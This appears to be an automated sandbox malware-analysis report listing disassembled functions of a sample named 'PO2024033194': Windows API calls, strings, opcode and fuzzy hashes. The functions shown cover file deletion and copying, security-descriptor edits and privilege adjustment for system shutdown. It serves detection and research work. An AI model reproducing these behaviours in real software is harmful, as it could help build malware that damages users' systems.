                                                                  • String ID: $@OH$default$winsta0
                                                                  • API String ID: 3324942560-3791954436
                                                                  • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                  • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                  Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 004096C1
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _memmove.LIBCMT ref: 0040970C
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                  • _memmove.LIBCMT ref: 00409D96
                                                                  • _memmove.LIBCMT ref: 0040A6C4
                                                                  • _memmove.LIBCMT ref: 004297E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2383988440-0
                                                                  • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                  • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                  Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • _wcscat.LIBCMT ref: 0044BD94
                                                                  • _wcscat.LIBCMT ref: 0044BDBD
                                                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                  • _wcscpy.LIBCMT ref: 0044BE71
                                                                  • _wcscat.LIBCMT ref: 0044BE83
                                                                  • _wcscat.LIBCMT ref: 0044BE95
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 2188072990-1173974218
                                                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                  Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                  • __swprintf.LIBCMT ref: 004789D3
                                                                  • __swprintf.LIBCMT ref: 00478A1D
                                                                  • __swprintf.LIBCMT ref: 00478A4B
                                                                  • __swprintf.LIBCMT ref: 00478A79
                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                  • __swprintf.LIBCMT ref: 00478AA7
                                                                  • __swprintf.LIBCMT ref: 00478AD5
                                                                  • __swprintf.LIBCMT ref: 00478B03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 999945258-2428617273
                                                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                  Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                  • __wsplitpath.LIBCMT ref: 00403492
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcscpy.LIBCMT ref: 004034A7
                                                                  • _wcscat.LIBCMT ref: 004034BC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                  • _wcscpy.LIBCMT ref: 004035A0
                                                                  • _wcslen.LIBCMT ref: 00403623
                                                                  • _wcslen.LIBCMT ref: 0040367D
                                                                  Strings
                                                                  • Unterminated string, xrefs: 00428348
                                                                  • Error opening the file, xrefs: 00428231
                                                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                  • _, xrefs: 0040371C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                  • API String ID: 3393021363-188983378
                                                                  • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                  • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                  Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1409584000-438819550
                                                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                  Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                  • __swprintf.LIBCMT ref: 00431C2E
                                                                  • _wcslen.LIBCMT ref: 00431C3A
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2192556992-3457252023
                                                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                  Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                  • __swprintf.LIBCMT ref: 004722B9
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FolderPath$LocalTime__swprintf
                                                                  • String ID: %.3d
                                                                  • API String ID: 3337348382-986655627
                                                                  • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                  • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                  Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 2640511053-438819550
                                                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                  Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                  • GetLastError.KERNEL32 ref: 00433414
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 2938487562-3733053543
                                                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                  Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                  • String ID:
                                                                  • API String ID: 1255039815-0
                                                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                  Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 00433073
                                                                  • __swprintf.LIBCMT ref: 00433085
                                                                  • __wcsicoll.LIBCMT ref: 00433092
